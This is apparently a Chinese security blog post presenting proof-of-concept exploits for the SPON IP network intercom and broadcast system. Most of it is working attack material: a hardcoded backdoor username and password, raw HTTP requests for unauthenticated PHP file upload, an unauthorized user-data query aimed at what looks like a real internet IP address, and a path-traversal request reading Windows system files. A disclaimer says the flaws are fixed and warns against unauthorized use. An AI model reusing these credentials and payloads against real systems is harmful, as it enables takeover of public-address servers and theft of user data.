5个世邦通信SPON IP网络对讲广播系统漏洞【附POC】

11天前发布

文章中涉及的漏洞均已修复，敏感信息已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任，一旦造成后果请自行负责。

四个世邦通信SPON IP网络对讲广播系统漏洞

b4c1607b0a20250716110806

1.后门账号

账号：administrator
密码：800823
可直接登录系统

2.addscenedata.php 任意文件上传漏洞

POST /php/addscenedata.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 279
Content-Type: multipart/form-data; boundary=b0b0dcc3da2dd47434dfbafd7be4c6d5965a5bf03b1e9affc7e72eea848b
Accept-Encoding: gzip, deflate, br
Connection: close

--b0b0dcc3da2dd47434dfbafd7be4c6d5965a5bf03b1e9affc7e72eea848b
Content-Disposition: form-data; name="upload"; filename="test.php"
Content-Type: application/octet-stream

<?php echo md5(1);unlink(__FILE__);?>
--b0b0dcc3da2dd47434dfbafd7be4c6d5965a5bf03b1e9affc7e72eea848b--

d2b5ca33bd20250716111231

访问路径：http://127.0.0.1/images/scene/test.php

d2b5ca33bd20250716111247

3.未授权访问

POST /php/getuserdata.php HTTP/1.1
Host: 222.74.183.66:81
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

jsondata[pageIndex]=0&jsondata[pageCount]=30

ce7395b14f20250716111437

4.exportrecord.php 任意文件读取漏洞

GET /php/exportrecord.php?downtype=10&downname=C:\xxdd.txt\..\Windows\win.ini 
HTTP/1.1
Host:

efdd5a344820250716111717

5.SPON世邦IP网络对讲广播系统 addscenedata.php、uploadjson.php、my_parser.php等接口处存在任意文件上传漏洞，未经身份验证的攻击者可利用此漏洞上传恶意后门文件，可导致服务器失陷。

POST /php/addscenedata.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4LuoBRpTiVBo9cIQ
Accept-Encoding: gzip------WebKitFormBoundary4LuoBRpTiVBo9cIQ
Content-Disposition: form-data; name="upload"; filename="1.php"
Content-Type: application/octet-stream<?php phpinfo(); ?>

08024cb2a220250716111853

评分

欢迎为Ta评分